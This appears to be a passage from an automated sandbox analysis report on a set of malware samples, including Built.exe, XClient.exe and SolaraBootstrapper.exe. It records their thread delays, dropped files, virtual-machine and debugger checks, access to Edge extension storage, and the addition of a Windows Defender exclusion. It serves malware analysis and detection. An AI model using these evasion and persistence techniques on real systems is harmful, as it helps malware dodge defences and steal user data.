Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598575
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598367
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 597959
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Brokercrt\comReviewsession.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window / User API: threadDelayed 6565
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Window / User API: threadDelayed 3244
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Window / User API: threadDelayed 1289
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Window / User API: threadDelayed 805
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7566
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6607
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7521
Source: C:\Brokercrt\comReviewsession.exe	Window / User API: threadDelayed 526
Source: C:\Brokercrt\comReviewsession.exe	Window / User API: threadDelayed 643
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4012
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Window / User API: threadDelayed 365
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Window / User API: threadDelayed 362
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Window / User API: threadDelayed 362
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Window / User API: threadDelayed 365
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Window / User API: threadDelayed 363

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\python311.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\rar.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pyd	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_1-16912

Source: C:\Users\user\AppData\Local\Temp\Built.exe

API coverage: 6.5 %

Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 8548	Thread sleep time: -23980767295822402s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -599844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -599732s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -599609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -599493s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -599374s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -599031s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -598922s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -598804s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -598702s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -598575s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -598367s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -598234s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -598109s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7488	Thread sleep time: -597959s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7328	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe TID: 7312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep count: 7566 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7716	Thread sleep count: 610 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep count: 6607 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728	Thread sleep count: 117 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Brokercrt\comReviewsession.exe TID: 7660	Thread sleep count: 526 > 30
Source: C:\Brokercrt\comReviewsession.exe TID: 3384	Thread sleep count: 643 > 30
Source: C:\Brokercrt\comReviewsession.exe TID: 7464	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7292	Thread sleep count: 4012 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep count: 99 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe TID: 8152	Thread sleep count: 365 > 30
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe TID: 9160	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe TID: 1744	Thread sleep count: 362 > 30
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe TID: 8456	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe TID: 9004	Thread sleep count: 362 > 30
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe TID: 8752	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe TID: 7772	Thread sleep count: 365 > 30
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe TID: 9020	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe TID: 9140	Thread sleep count: 363 > 30
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe TID: 9168	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Brokercrt\comReviewsession.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C85A0 FindFirstFileExW,FindClose,	1_2_00007FF76D5C85A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF76D5C79B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF76D5E0B84
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_0029A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	2_2_0029A5F4
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002AB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	2_2_002AB8E0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C85A0 FindFirstFileExW,FindClose,	3_2_00007FF76D5C85A0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5C79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	3_2_00007FF76D5C79B0
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5E0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00007FF76D5E0B84

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe

Code function: 2_2_002ADD72 VirtualQuery,GetSystemInfo,

2_2_002ADD72

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599844
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599732
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599609
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599493
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599374
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 599031
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598804
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598702
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598575
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598367
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 598109
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 597959
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Brokercrt\comReviewsession.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def	Jump to behavior

Source: Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWems,%SystemRoot%\system32\mswsock.dllds of the socket object.
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: comReviewsession.exe, 00000026.00000002.1916487739.000000001C50D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d8HvYJOq9YxQzTMJIcOmRJHMACSHA1HKISFgTYJMKjSSblskpPFhiSX9mp8UYHPSulBGGiWqHS2ZCmYXppHSPY4VhT838vVbg249oLASx2w6M73XO7OVnnA2624CtGJaJMbhc58EeI8dWk3O8bLTXvmciEclW0vHRWZhHVkivqc1SS0up4xS4Q5FVmLpScmUmCMOhkHdLOY7323IcTWieW
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: comReviewsession.exe, 00000026.00000002.1917145309.000000001C57A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
Source: svchosts.exe, 00000002.00000003.1707345062.00000000031F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d-
Source: wscript.exe, 00000005.00000002.1807041787.0000000002AB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: XClient.exe, 00000006.00000002.2837735994.000000001C2B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: SolaraBootstrapper.exe, 00000007.00000002.1754382255.0000000000B73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: comReviewsession.exe, 00000026.00000000.1806567735.0000000000EC2000.00000002.00000001.01000000.00000022.sdmp	Binary or memory string: bLTXvmciEclW0vHRWZh
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: Built.exe, 00000003.00000003.1891900310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1928015853.000001D5E629F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe

API call chain: ExitProcess graph end node

graph_2-24466

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Process information queried: ProcessInformation

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 1_2_00007FF76D5D9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00007FF76D5D9924

Source: C:\Users\user\AppData\Local\Temp\svchosts.exe

Code function: 2_2_002B753D mov eax, dword ptr fs:[00000030h]

2_2_002B753D

Source: C:\Users\user\AppData\Local\Temp\Built.exe

Code function: 1_2_00007FF76D5E2790 GetProcessHeap,

1_2_00007FF76D5E2790

Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Brokercrt\comReviewsession.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\it-IT\dasHost.exe	Process token adjusted: Debug
Source: C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	Process token adjusted: Debug
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Process token adjusted: Debug
Source: C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5CC62C SetUnhandledExceptionFilter,	1_2_00007FF76D5CC62C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5D9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF76D5D9924
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5CC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00007FF76D5CC44C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 1_2_00007FF76D5CBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00007FF76D5CBBC0
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002AF063 SetUnhandledExceptionFilter,	2_2_002AF063
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002AF22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_002AF22B
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002B866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_002B866F
Source: C:\Users\user\AppData\Local\Temp\svchosts.exe	Code function: 2_2_002AEF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_002AEF05
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5CC62C SetUnhandledExceptionFilter,	3_2_00007FF76D5CC62C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5D9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF76D5D9924
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5CC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00007FF76D5CC44C
Source: C:\Users\user\AppData\Local\Temp\Built.exe	Code function: 3_2_00007FF76D5CBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF76D5CBBC0

Source: C:\Users\user\AppData\Local\Temp\XClient.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

